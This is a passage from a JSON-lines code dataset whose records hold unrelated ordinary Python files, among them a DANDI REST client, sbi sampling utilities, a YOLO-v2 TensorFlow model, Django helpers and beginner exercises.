sigma_mle_2))\n","sub_path":"IFT6269/A2/A2Code/A2Code.py","file_name":"A2Code.py","file_ext":"py","file_size_in_byte":13007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"271539237","text":"\n\n#class header\nclass _PULLEY():\n\tdef __init__(self,): \n\t\tself.name = \"PULLEY\"\n\t\tself.definitions = [u'a piece of equipment for moving heavy objects up or down, consisting of a small wheel over which a rope or chain attached to the object can be easily raised or lowered: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = 
[]):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_pulley.py","file_name":"_pulley.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"263428925","text":"#--MUNDO 3--\r\n#Desafio 72\r\n'''\r\nCreate a program that has a Tuple fully populated with the numbers ZERO through TWENTY written out in words.\r\nThe program should read a number from the keyboard (between 0 and 20) and display it written out.\r\nThe program should also check that the user entered a number in the correct range (0 to 20).\r\nE.g.: Enter a number between 0 and 20: 90 (error! try again!)\r\nE.g.: Enter a number between 0 and 20: 16 (you typed the number sixteen)\r\n'''\r\nnumeros = ('Zero', 'Um', 'Dois', 'Três', 'Quatro', 'Cinco', 'Seis', 'Sete', 'Oito', 'Nove',\\\r\n 'Dez', 'Onze', 'Doze', 'Treze', 'Quatorze', 'Quinze', 'Dezesseis', 'Dezessete', 'Dezoito', 'Dezenove', 'Vinte')\r\n\r\nindice = int(input('Digite um número entre 0 e 20: '))\r\nwhile indice < 0 or indice > 20:\r\n print('Tente Novamente!')\r\n indice = int(input('Digite um número entre 0 e 20: '))\r\nprint('Você digitou o número {}'.format(numeros[indice]))\r\n\r\n","sub_path":"Desafio072.py","file_name":"Desafio072.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"206152787","text":"\"\"\"\nTrain low-data Tox21 models with graph-convolution. Test last fold only.\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport numpy as np\nnp.random.seed(123)\nimport tensorflow as tf\ntf.random.set_seed(123)\nimport deepchem as dc\nfrom datasets import load_tox21_convmol\n\n# 4-fold splits\nK = 4\n# num positive/negative ligands\nn_pos = 10\nn_neg = 10\nn_trials = 20\n\ntox21_tasks, dataset, transformers = load_tox21_convmol()\n\n# Define metric\nmetric = dc.metrics.Metric(dc.metrics.roc_auc_score, mode=\"classification\")\n\ntask_splitter = dc.splits.TaskSplitter()\nfold_datasets = task_splitter.k_fold_split(dataset, K)\n\ntrain_folds = fold_datasets[:-1]\ntrain_dataset = dc.splits.merge_fold_datasets(train_folds)\ntest_dataset = fold_datasets[-1]\n\n# Get supports on test-set\nsupport_generator = dc.data.SupportGenerator(test_dataset, n_pos, n_neg,\n n_trials)\n\n# Compute accuracies\ntask_scores = {task: [] for task in range(len(test_dataset.get_task_names()))}\n\nfor trial_num, (task, support) in enumerate(support_generator):\n print(\"Starting trial %d\" % trial_num)\n\n # Number of features on conv-mols\n n_feat = 75\n # Batch size of models\n batch_size = 50\n graph_model = dc.nn.SequentialGraph(n_feat)\n graph_model.add(dc.nn.GraphConv(64, n_feat, activation='relu'))\n graph_model.add(dc.nn.GraphPool())\n graph_model.add(dc.nn.GraphConv(128, 64, activation='relu'))\n graph_model.add(dc.nn.GraphPool())\n graph_model.add(dc.nn.GraphConv(64, 128, activation='relu'))\n graph_model.add(dc.nn.GraphPool())\n graph_model.add(dc.nn.Dense(128, 64, activation='tanh'))\n graph_model.add(dc.nn.GraphGather(batch_size, activation=\"tanh\"))\n\n model = dc.models.MultitaskGraphClassifier(\n graph_model,\n 1,\n n_feat,\n batch_size=batch_size,\n learning_rate=1e-3,\n learning_rate_decay_time=1000,\n optimizer_type=\"adam\",\n beta1=.9,\n beta2=.999)\n\n # Fit trained model\n model.fit(support, nb_epoch=10)\n\n # Test model\n task_dataset = dc.data.get_task_dataset_minus_support(test_dataset, support,\n 
task)\n y_pred = model.predict(task_dataset)\n score = metric.compute_metric(task_dataset.y, y_pred, task_dataset.w)\n print(\"Score on task %s is %s\" % (str(task), str(score)))\n task_scores[task].append(score)\n\n# Join information for all tasks.\nmean_task_scores = {}\nstd_task_scores = {}\nfor task in range(len(test_dataset.get_task_names())):\n mean_task_scores[task] = np.mean(np.array(task_scores[task]))\n std_task_scores[task] = np.std(np.array(task_scores[task]))\n\nprint(\"Mean scores\")\nprint(mean_task_scores)\nprint(\"Standard Deviations\")\nprint(std_task_scores)\nprint(\"Median of Mean Scores\")\nprint(np.median(np.array(mean_task_scores.values())))\n","sub_path":"examples/low_data/tox_graph_conv_one_fold.py","file_name":"tox_graph_conv_one_fold.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"564893546","text":"import django\nfrom django.conf import settings\nfrom django.core.serializers.json import DjangoJSONEncoder\nimport json\nimport six\n\ndef to_json(data):\n kw = {}\n if six.PY2:\n kw['encoding'] = 'utf-8'\n return json.dumps(data, cls=DjangoJSONEncoder, ensure_ascii=False, separators=(',',':'), **kw)\n\ndef pretty_diff(a, b):\n import diff_match_patch\n d = diff_match_patch.diff_match_patch()\n e = d.diff_main(a, b)\n return d.diff_prettyHtml(e)\n\ndef get_setting(name):\n \"\"\" Looks for settings under DJANGO_HISTORY_SETTINGS, supporting dot notation for nested lookups,\n eg. get_setting('EXCLUDE_CHANGES.fields') \"\"\"\n dh = getattr(settings, 'DJANGO_HISTORY_SETTINGS', {})\n result = None\n for k in name.split('.'):\n if dh is None:\n continue\n result = dh.get(k, None)\n dh = result\n return result\n\ndef get_relation(rel):\n django_version = '.'.join(map(str, django.VERSION[:2]))\n if django_version >= '1.8':\n instance = rel.related.model\n else:\n instance = rel.related.parent_model\n return instance\n","sub_path":"djangohistory/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"624651036","text":"from django.contrib import admin\nfrom .models import Services_Data\n\nclass AdminService_Data(admin.ModelAdmin):\n list_display =['course_id',\n 'course_name',\n 'course_duration',\n 'course_start_date',\n 'course_start_time',\n 'course_trainer_name',\n 'course_trainer_exp']\nadmin.site.register(Services_Data, AdminService_Data)\n","sub_path":"admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"474407958","text":"from contextlib import contextmanager\n\nimport requests\n\nfrom . import get_logger\nfrom .utils import ensure_datetime\nfrom .consts import MAX_CHUNK_SIZE\n\nlgr = get_logger()\n\n\n# Following class is loosely based on GirderClient, with authentication etc\n# being stripped.\n# TODO: add copyright/license info\nclass RESTFullAPIClient(object):\n \"\"\"A base class for REST clients\"\"\"\n\n def __init__(self, api_url):\n self.api_url = api_url\n self._session = None\n\n @contextmanager\n def session(self, session=None):\n \"\"\"\n Use a :class:`requests.Session` object for all outgoing requests.\n If `session` isn't passed into the context manager\n then one will be created and yielded. 
Session objects are useful for enabling\n persistent HTTP connections as well as partially applying arguments to many\n requests, such as headers.\n\n Note: `session` is closed when the context manager exits, regardless of who\n created it.\n\n .. code-block:: python\n\n with client.session() as session:\n session.headers.update({'User-Agent': 'myapp 1.0'})\n\n for item in items:\n client.downloadItem(item, fh)\n\n In the above example, each request will be executed with the User-Agent header\n while reusing the same TCP connection.\n\n :param session: An existing :class:`requests.Session` object, or None.\n \"\"\"\n self._session = session if session else requests.Session()\n\n try:\n yield self._session\n finally:\n # close only if we started a new one\n if not session:\n self._session.close()\n self._session = None\n\n def _request_func(self, method):\n if self._session is not None:\n return getattr(self._session, method.lower())\n else:\n return getattr(requests, method.lower())\n\n def send_request(\n self,\n method,\n path,\n parameters=None,\n data=None,\n files=None,\n json=None,\n headers=None,\n json_resp=True,\n **kwargs,\n ):\n \"\"\"\n This method looks up the appropriate method, constructs a request URL\n from the base URL, path, and parameters, and then sends the request. If\n the method is unknown or if the path is not found, an exception is\n raised, otherwise a JSON object is returned with the response.\n\n This is a convenience method to use when making basic requests that do\n not involve multipart file data that might need to be specially encoded\n or handled differently.\n\n :param method: The HTTP method to use in the request (GET, POST, etc.)\n :type method: str\n :param path: A string containing the path elements for this request.\n Note that the path string should not begin or end with the path separator, '/'.\n :type path: str\n :param parameters: A dictionary mapping strings to strings, to be used\n as the key/value pairs in the request parameters.\n :type parameters: dict\n :param data: A dictionary, bytes or file-like object to send in the body.\n :param files: A dictionary of 'name' => file-like-objects for multipart encoding upload.\n :type files: dict\n :param json: A JSON object to send in the request body.\n :type json: dict\n :param headers: If present, a dictionary of headers to encode in the request.\n :type headers: dict\n :param json_resp: Whether the response should be parsed as JSON. If False, the raw\n response object is returned. To get the raw binary content of the response,\n use the ``content`` attribute of the return value, e.g.\n\n .. code-block:: python\n\n resp = client.get('my/endpoint', json_resp=False)\n print(resp.content) # Raw binary content\n print(resp.headers) # Dict of headers\n\n :type json_resp: bool\n \"\"\"\n if not parameters:\n parameters = {}\n\n # Look up the HTTP method we need\n f = self._request_func(method)\n\n url = self.get_url(path)\n\n # Make the request, passing parameters and authentication info\n _headers = headers or {}\n\n if json_resp and \"accept\" not in _headers:\n _headers[\"accept\"] = \"application/json\"\n\n result = f(\n url,\n params=parameters,\n data=data,\n files=files,\n json=json,\n headers=_headers,\n **kwargs,\n )\n\n # If success, return the json object. 
Otherwise throw an exception.\n if not result.ok:\n raise requests.HTTPError(\n f\"Error {result.status_code} while sending {method} request to {url}\",\n response=result,\n )\n\n if json_resp:\n return result.json()\n else:\n return result\n\n def get_url(self, path):\n # Construct the url\n if self.api_url.endswith(\"/\") and path.startswith(\"/\"):\n path = path[1:]\n url = self.api_url + path\n return url\n\n def get(self, path, parameters=None, json_resp=True):\n \"\"\"\n Convenience method to call :py:func:`send_request` with the 'GET' HTTP method.\n \"\"\"\n return self.send_request(\"GET\", path, parameters, json_resp=json_resp)\n\n def post(\n self,\n path,\n parameters=None,\n files=None,\n data=None,\n json=None,\n headers=None,\n json_resp=True,\n ):\n \"\"\"\n Convenience method to call :py:func:`send_request` with the 'POST' HTTP method.\n \"\"\"\n return self.send_request(\n \"POST\",\n path,\n parameters,\n files=files,\n data=data,\n json=json,\n headers=headers,\n json_resp=json_resp,\n )\n\n def put(self, path, parameters=None, data=None, json=None, json_resp=True):\n \"\"\"\n Convenience method to call :py:func:`send_request` with the 'PUT'\n HTTP method.\n \"\"\"\n return self.send_request(\n \"PUT\", path, parameters, data=data, json=json, json_resp=json_resp\n )\n\n def delete(self, path, parameters=None, json_resp=True):\n \"\"\"\n Convenience method to call :py:func:`send_request` with the 'DELETE' HTTP method.\n \"\"\"\n return self.send_request(\"DELETE\", path, parameters, json_resp=json_resp)\n\n def patch(self, path, parameters=None, data=None, json=None, json_resp=True):\n \"\"\"\n Convenience method to call :py:func:`send_request` with the 'PATCH' HTTP method.\n \"\"\"\n return self.send_request(\n \"PATCH\", path, parameters, data=data, json=json, json_resp=json_resp\n )\n\n\nclass DandiAPIClient(RESTFullAPIClient):\n def get_asset(self, dandiset_id, version, uuid):\n \"\"\"\n\n /dandisets/{version__dandiset__pk}/versions/{version__version}/assets/{uuid}/\n\n Parameters\n ----------\n dandiset_id\n version\n uuid\n\n Returns\n -------\n\n \"\"\"\n return self.get(f\"/dandisets/{dandiset_id}/versions/{version}/assets/{uuid}/\")\n\n def get_dandiset(self, dandiset_id, version):\n return self._migrate_dandiset_metadata(\n self.get(f\"/dandisets/{dandiset_id}/versions/{version}/\")\n )\n\n def get_dandiset_assets(self, dandiset_id, version, location=None, page_size=None):\n \"\"\"A generator to provide asset records\n \"\"\"\n if location is not None:\n raise NotImplementedError(\n \"location specific query. See https://github.com/dandi/dandi-publish/issues/77\"\n )\n # although we could just provide ad-hoc implementation here for now. 
TODO\n if page_size is not None:\n raise NotImplementedError(\"paginated query is not supported yet\")\n page_size = 1000000\n resp = self.get(\n f\"/dandisets/{dandiset_id}/versions/{version}/assets/\",\n parameters={\"page_size\": page_size},\n )\n try:\n assert not resp.get(\n \"next\"\n ), \"ATM we do not support pagination and result should have not been paginated\"\n assert not resp.get(\"prev\")\n results = resp.get(\"results\", [])\n assert len(results) == resp.get(\"count\")\n # Just some sanity checks for now, but might change, see\n # https://github.com/dandi/dandi-publish/issues/79\n assert all(\n r.get(\"version\", {}).get(\"dandiset\", {}).get(\"identifier\")\n == dandiset_id\n for r in results\n )\n assert all(r.get(\"version\", {}).get(\"version\") == version for r in results)\n except AssertionError:\n lgr.error(\n f\"Some expectations on returned /assets/ for {dandiset_id}@{version} are violated\"\n )\n raise\n # Things might change, so let's just return only \"relevant\" ATM information\n # under assumption that assets belong to the current version of the dataset requested\n # results_ = [\n # {k: r[k] for k in (\"path\", \"uuid\", \"size\", \"sha256\", \"metadata\") if k in r}\n # for r in results\n # ]\n for r in results:\n # check for paranoid Yarik with current multitude of checksums\n # r['sha256'] is what \"dandi-publish\" computed, but then\n # metadata could contain multiple digests computed upon upload\n metadata = r.get(\"metadata\")\n if (\n \"sha256\" in r\n and \"sha256\" in metadata\n and metadata[\"sha256\"] != r[\"sha256\"]\n ):\n lgr.warning(\"sha256 mismatch for %s\" % str(r))\n # There is no \"modified\" time stamp and \"updated\" also shows something\n # completely different, so if \"modified\" is not there -- we will try to\n # get it from metadata\n if \"modified\" not in r and metadata:\n uploaded_mtime = metadata.get(\"uploaded_mtime\")\n if uploaded_mtime:\n r[\"modified\"] = ensure_datetime(uploaded_mtime)\n yield r\n\n def get_dandiset_and_assets(self, dandiset_id, version, location=None):\n \"\"\"This is pretty much an adapter to provide \"harmonized\" output in both\n girder and DANDI api clients.\n\n Harmonization should happen toward DADNDI API BUT AFAIK it is still influx\n \"\"\"\n # Fun begins!\n location_ = \"/\" + location if location else \"\"\n lgr.info(f\"Traversing {dandiset_id}{location_} (version: {version})\")\n\n # TODO: get all assets\n # 1. includes sha256, created, updated but those are of \"girder\" level\n # so lack \"uploaded_mtime\" and uploaded_nwb_object_id forbidding logic for\n # deducing necessity to update/move. But we still might want to rely on its\n # sha256 instead of metadata since older uploads would not have that metadata\n # in them\n # 2. 
there is no API to list assets given a location\n #\n # Get dandiset information\n dandiset = self.get_dandiset(dandiset_id, version)\n # TODO: location\n assets = self.get_dandiset_assets(dandiset_id, version, location=location)\n return dandiset, assets\n\n def get_download_file_iter(\n self, dandiset_id, version, uuid, chunk_size=MAX_CHUNK_SIZE\n ):\n url = self.get_url(\n f\"/dandisets/{dandiset_id}/versions/{version}/assets/{uuid}/download/\"\n )\n\n def downloader(start_at=0):\n lgr.debug(\"Starting download from %s\", url)\n headers = None\n if start_at > 0:\n headers = {\"Range\": f\"bytes={start_at}-\"}\n result = (self._session if self._session else requests).get(\n url, stream=True, headers=headers\n )\n # TODO: apparently we might need retries here as well etc\n # if result.status_code not in (200, 201):\n result.raise_for_status()\n\n for chunk in result.raw.stream(chunk_size, decode_content=False):\n if chunk: # could be some \"keep alive\"?\n yield chunk\n\n return downloader\n\n # TODO: remove when API stabilizes\n\n # Should perform changes in-place but also return the original record\n\n @classmethod\n def _migrate_dandiset_metadata(cls, dandiset):\n dandiset_metadata = dandiset.get(\"metadata\", {})\n if not dandiset_metadata:\n return dandiset\n # DANDI API has no versioning yet, and things are in flux.\n # It used to have metadata within a key... just in case let's also\n # be able to handle \"old\" style\n if \"identifier\" not in dandiset_metadata and \"dandiset\" in dandiset_metadata:\n dandiset[\"metadata\"] = dandiset_metadata.pop(\"dandiset\")\n return dandiset\n","sub_path":"dandi/dandiapi.py","file_name":"dandiapi.py","file_ext":"py","file_size_in_byte":13066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"603892491","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 19 15:43:47 2016\n\n@author: zhengyaolin\n\"\"\"\n\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n \nclass Solution(object):\n def preorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n self.nodes = []\n result = []\n if root is not None:\n self.nodes.append(root)\n self.pre_traverse(root)\n for i in self.nodes:\n result.append(i.val)\n return result\n \n def pre_traverse(self, node):\n if node.left is None and node.right is None:\n return\n if node.left is not None:\n self.nodes.append(node.left)\n self.pre_traverse(node.left)\n if node.right is not None:\n self.nodes.append(node.right)\n self.pre_traverse(node.right)\n\n","sub_path":"LeetCode/BTPreorderTraversal.py","file_name":"BTPreorderTraversal.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"491468280","text":"import time\nimport warnings\nfrom typing import Tuple, Sequence, Union\n\nimport torch\nimport torch.nn as nn\nimport sbi.utils as utils\n\n\n# XXX standardize? 
zscore?\n# XXX want to insert it in Sequential\nclass Normalize(nn.Module):\n def __init__(self, mean, std):\n super(Normalize, self).__init__()\n self.mean = mean\n self.std = std\n\n def forward(self, tensor):\n # XXX guard against std \\sim 0 (epsilon or raise)\n return (tensor - self.mean) / self.std\n\n\ndef match_shapes_of_inputs_and_contexts(\n inputs: Union[Sequence[float], float],\n context: Union[Sequence[float], float],\n true_context: torch.Tensor,\n correct_for_leakage: bool,\n) -> (torch.Tensor, torch.Tensor):\n \"\"\"\n Formats inputs and contexts into shapes that can be processed by neural density\n estimators.\n\n Neural density estimators require the first dimension of inputs and contexts to\n match, `inputs.shape == (N, dim_inputs)` and `context.shape == (N, dim_context)`,\n with N being the number of data points where we evaluate the density estimator.\n In this function, we match the shape of context to the shape of inputs.\n Assume that x is the context, x_o is the true_context, theta are inputs/parameters.\n If context has shape (dim_x) or (1, dim_x), we build\n `context = torch.tensor([x, x,..., x])` such that we can later evaluate\n p(theta_n|x) for every parameter set theta_n in inputs\n If context is None, we build `context = torch.tensor([x_o, x_o,..., x_o])` such that\n we can later evaluate p(theta_n|x_o) for every parameter set theta_n in inputs\n If context has shape or (N, dim_x) and inputs has shape (N, dim_theta), we leave\n context unaltered as `context = torch.tensor([x_1, x_2,..., x_N])` such that we can\n later evaluate p(theta_n|x_n) for every parameter set theta_n in inputs with\n n={1,...,N}\n\n Args:\n inputs: input variables / parameters / thetas\n context: conditioning variables / contexts / x. If None, the context is ignored.\n true_context: if context=None, replace it with true_context\n correct_for_leakage:\n If True, we normalize the output density\n by drawing samples, estimating the acceptance\n ratio, and then scaling the probability with it\n\n Returns:\n inputs, context with same batch dimension\n \"\"\"\n\n # cast inputs to tensor if they are not already\n inputs = torch.as_tensor(inputs)\n\n # add batch dimension to `inputs` if needed. `inputs` how has shape\n # (1, num_dim_inputs) or (N, num_dim_inputs), but not (num_dim_inputs)\n inputs = utils.torchutils.ensure_parameter_batched(inputs)\n\n # use \"default context\" if None is provided\n if context is None:\n context = true_context\n # cast context to tensor if they are not already\n context = torch.as_tensor(context)\n\n # add batch dimension to `context` if needed. `context` how has shape\n # (1, num_dim_context) or (N, num_dim_context), but not (num_dim_context)\n # todo: this will break if we have a multi-dimensional context, e.g. 
images\n if len(context.shape) == 1:\n context = context.unsqueeze(0)\n\n # if multiple observations, with snpe avoid expensive leakage\n # correction by rejection sampling\n if context.shape[0] > 1 and correct_for_leakage:\n raise ValueError(\n \"Only a single context allowed for log-prob when normalizing the density.\"\n \"Please use a for-loop over your inputs and contexts.\"\n )\n\n if context.shape[0] != inputs.shape[0]:\n # multiple parameters, single observation:\n # repeat the context to match the parameters\n context = context.repeat(inputs.shape[0], 1)\n\n if inputs.shape[0] != context.shape[0]:\n # catch all remaining errors after shape-mangling above\n # THIS SHOULD NEVER HAPPEN\n raise ValueError(\n \"Number of input items must be equal to number of context items.\"\n )\n\n return inputs, context\n\n\ndef sample_posterior_within_prior(\n posterior_nn: torch.nn.Module,\n prior: torch.distributions.Distribution,\n context: torch.Tensor,\n num_samples: int = 1,\n patience: int = 5,\n) -> Tuple[torch.Tensor, float]:\n \"\"\"Return samples from a posterior within the support of the prior via rejection sampling. \n \n This is relevant for snpe methods and flows for which the posterior tends to have mass outside the prior boundaries. \n \n This function uses rejection sampling with samples from posterior, to do two things: \n 1) obtain posterior samples within the prior support. \n 2) calculate the fraction of accepted samples as a proxy for correcting the density during evaluation of the posterior. \n \n Arguments:\n posterior_nn {torch.nn.Module} -- neural net representing the posterior\n prior {torch.distributions.Distribution} -- torch distribution prior\n context {torch.Tensor} -- context for the posterior, i.e., the observed data to condition on. \n \n Keyword Arguments:\n num_samples {int} -- number of sample to generate (default: {1})\n patience {int} -- upper time bound in minutes, in case sampling takes too long due to strong leakage (default: {5})\n \n Returns:\n Tuple[torch.Tensor, float] -- Accepted samples, and estimated acceptance probability\n \"\"\"\n\n assert (\n not posterior_nn.training\n ), \"posterior nn is in training mode, but has to be in eval mode for sampling.\"\n\n samples = []\n num_remaining = num_samples\n num_sampled_total = 0\n tstart = time.time()\n time_over = time.time() - tstart > (patience * 60)\n\n while num_remaining > 0 and not time_over:\n\n sample = posterior_nn.sample(num_remaining, context=context)\n num_sampled_total += num_remaining\n\n is_within_prior = torch.isfinite(prior.log_prob(sample))\n num_in_prior = is_within_prior.sum().item()\n\n if num_in_prior > 0:\n samples.append(sample[is_within_prior,].reshape(num_in_prior, -1))\n num_remaining -= num_in_prior\n\n # update timer\n time_over = time.time() - tstart > (patience * 60)\n\n # collect all samples in the list into one tensor\n samples = torch.cat(samples)\n\n # estimate acceptance probability\n acceptance_prob = float((samples.shape[0]) / num_sampled_total)\n\n if num_remaining > 0:\n warnings.warn(\n f\"Beware: Rejection sampling resulted in only {samples.shape[0]} samples within patience of {patience} min. 
Consider having more patience, leakage is {1-acceptance_prob}\"\n )\n\n return samples, acceptance_prob\n","sub_path":"sbi/utils/sbiutils.py","file_name":"sbiutils.py","file_ext":"py","file_size_in_byte":6656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"104302193","text":"import Siconos.Numerics as Numerics\n\nt0 = 0\nT = 7\nh = 0.0005\ng = 9.81\ntheta = 0.50001\nmu = 0.7\ndump_itermax = 100\ndump_probability = .02\nNewtonMaxIter = 20\nitermax = 100000\ntolerance = 1e-8\nsolver = Numerics.SICONOS_FRICTION_3D_NSGS\n\nfileName = \"BoxesStack1\"\ntitle = \"Boxes Stack\"\ndescription = \"\"\"\nBoxes (Cubes) stacking with Bullet collision detection\nMoreau TimeStepping: h={0}, theta = {1}\nOne Step non smooth problem: {2}, maxiter={3}, tol={4}\n\"\"\".format(h, theta, Numerics.idToName(solver),\n itermax,\n tolerance)\n\nmathInfo = \"\"\n","sub_path":"siconos/BoxesStack/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"106040593","text":"\n\"\"\"YOLO-v2 model.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\n\nimport joblib\nfrom utils import util\nfrom easydict import EasyDict as edict\nimport numpy as np\nimport tensorflow as tf\nfrom nn_skeleton import ModelSkeleton\n\n\nclass YOLO_V2(ModelSkeleton):\n def __init__(self, mc, gpu_id):\n with tf.device('/gpu:{}'.format(gpu_id)):\n ModelSkeleton.__init__(self, mc)\n\n self.BN = mc.BN\n self._add_forward_graph()\n self._add_yolo_interpret_graph()\n #self._add_yolo_loss_graph()\n #self._add_train_graph()\n #self._add_viz_graph()\n\n def _add_forward_graph(self):\n \"\"\"Build the VGG-16 model.\"\"\"\n\n if self.mc.LOAD_PRETRAINED_MODEL:\n assert tf.gfile.Exists(self.mc.PRETRAINED_MODEL_PATH), \\\n 'Cannot find pretrained model at the given path:' \\\n ' {}'.format(self.mc.PRETRAINED_MODEL_PATH)\n self.caffemodel_weight = joblib.load(self.mc.PRETRAINED_MODEL_PATH)\n\n with tf.variable_scope('darknet19') as scope:\n conv1 = self._conv_layer(\n 'conv1', self.image_input, filters=32, size=3, stride=1, bn=self.BN, act='lrelu', freeze=True)\n pool1 = self._pooling_layer(\n 'pool1', conv1, size=2, stride=2)\n conv2 = self._conv_layer(\n 'conv2', pool1, filters=64, size=3, stride=1, bn=self.BN, act='lrelu', freeze=True)\n pool2 = self._pooling_layer(\n 'pool2', conv2, size=2, stride=2)\n conv3 = self._conv_layer(\n 'conv3', pool2, filters=128, size=3, stride=1, bn=self.BN, act='lrelu')\n conv4 = self._conv_layer(\n 'conv4', conv3, filters=64, size=1, stride=1, bn=self.BN, act='lrelu')\n conv5 = self._conv_layer(\n 'conv5', conv4, filters=128, size=3, stride=1, bn=self.BN, act='lrelu')\n pool3 = self._pooling_layer(\n 'pool3', conv5, size=2, stride=2)\n conv6 = self._conv_layer(\n 'conv6', pool3, filters=256, size=3, stride=1, bn=self.BN, act='lrelu')\n conv7 = self._conv_layer(\n 'conv7', conv6, filters=128, size=1, stride=1, bn=self.BN, act='lrelu')\n conv8 = self._conv_layer(\n 'conv8', conv7, filters=256, size=3, stride=1, bn=self.BN, act='lrelu')\n pool4 = self._pooling_layer(\n 'pool4', conv8, size=2, stride=2)\n conv9 = self._conv_layer(\n 'conv9', pool4, filters=512, size=3, stride=1, bn=self.BN, act='lrelu')\n conv10 = self._conv_layer(\n 'conv10', conv9, filters=256, size=1, stride=1, bn=self.BN, act='lrelu')\n conv11 = self._conv_layer(\n 'conv11', conv10, 
filters=512, size=3, stride=1, bn=self.BN, act='lrelu')\n conv12 = self._conv_layer(\n 'conv12', conv11, filters=256, size=1, stride=1, bn=self.BN, act='lrelu')\n conv13 = self._conv_layer(\n 'conv13', conv12, filters=512, size=3, stride=1, bn=self.BN, act='lrelu')\n pool5 = self._pooling_layer(\n 'pool5', conv13, size=2, stride=2)\n conv14 = self._conv_layer(\n 'conv14', pool5, filters=1024, size=3, stride=1, bn=self.BN, act='lrelu')\n conv15 = self._conv_layer(\n 'conv15', conv14, filters=512, size=1, stride=1, bn=self.BN, act='lrelu')\n conv16 = self._conv_layer(\n 'conv16', conv15, filters=1024, size=3, stride=1, bn=self.BN, act='lrelu')\n conv17 = self._conv_layer(\n 'conv17', conv16, filters=512, size=1, stride=1, bn=self.BN, act='lrelu')\n conv18 = self._conv_layer(\n 'conv18', conv17, filters=1024, size=3, stride=1, bn=self.BN, act='lrelu')\n\n with tf.variable_scope('detector') as scope:\n conv19 = self._conv_layer(\n 'conv19', conv18, filters=1024, size=3, stride=1, bn=self.BN, act='lrelu')\n conv20 = self._conv_layer(\n 'conv20', conv19, filters=1024, size=3, stride=1, bn=self.BN, act='lrelu')\n reorg20 = self._reorg_layer('reorg20', conv13, stride=2)\n concat20 = self._concat_layer('concat20', conv20, reorg20)\n conv21 = self._conv_layer(\n 'conv21', concat20, filters=1024, size=3, stride=1, bn=self.BN, act='lrelu')\n num_output = self.mc.ANCHOR_PER_GRID * (self.mc.CLASSES + 1 + 4)\n self.preds = self._conv_layer(\n 'conv22', conv21, filters=num_output, size=1, stride=1,\n padding='SAME', xavier=False, act=None, stddev=0.0001)\n self.conv13 = conv13\n self.conv20 = conv20\n self.reorg20 = reorg20\n self.concat20 = concat20\n","sub_path":"src/nets/yolo_v2.py","file_name":"yolo_v2.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"408495866","text":"# Importing the Kratos Library\nimport KratosMultiphysics as KM\n\n# Import applications\nimport KratosMultiphysics.StructuralMechanicsApplication as SMA\nimport KratosMultiphysics.ContactStructuralMechanicsApplication as CSMA\n\nimport KratosMultiphysics.kratos_utilities as kratos_utilities\nif kratos_utilities.CheckIfApplicationsAvailable(\"MeshingApplication\"):\n has_meshing_application = True\n # MA is referenced by the remeshing/metric processes below but was never bound; import it under the same guard\n import KratosMultiphysics.MeshingApplication as MA\nelse:\n has_meshing_application = False\n\n# Import adaptive remeshing utilities\nimport KratosMultiphysics.ContactStructuralMechanicsApplication.adaptative_remeshing_contact_structural_mechanics_utilities as adaptative_remeshing_contact_structural_mechanics_utilities\n\n# Import base class file\nimport KratosMultiphysics.ContactStructuralMechanicsApplication.contact_structural_mechanics_implicit_dynamic_solver as contact_structural_mechanics_implicit_dynamic_solver\n\ndef CreateSolver(model, custom_settings):\n return AdaptativeRemeshingContactImplicitMechanicalSolver(model, custom_settings)\n\nclass AdaptativeRemeshingContactImplicitMechanicalSolver(contact_structural_mechanics_implicit_dynamic_solver.ContactImplicitMechanicalSolver):\n \"\"\"The contact structural mechanics implicit dynamic solver. 
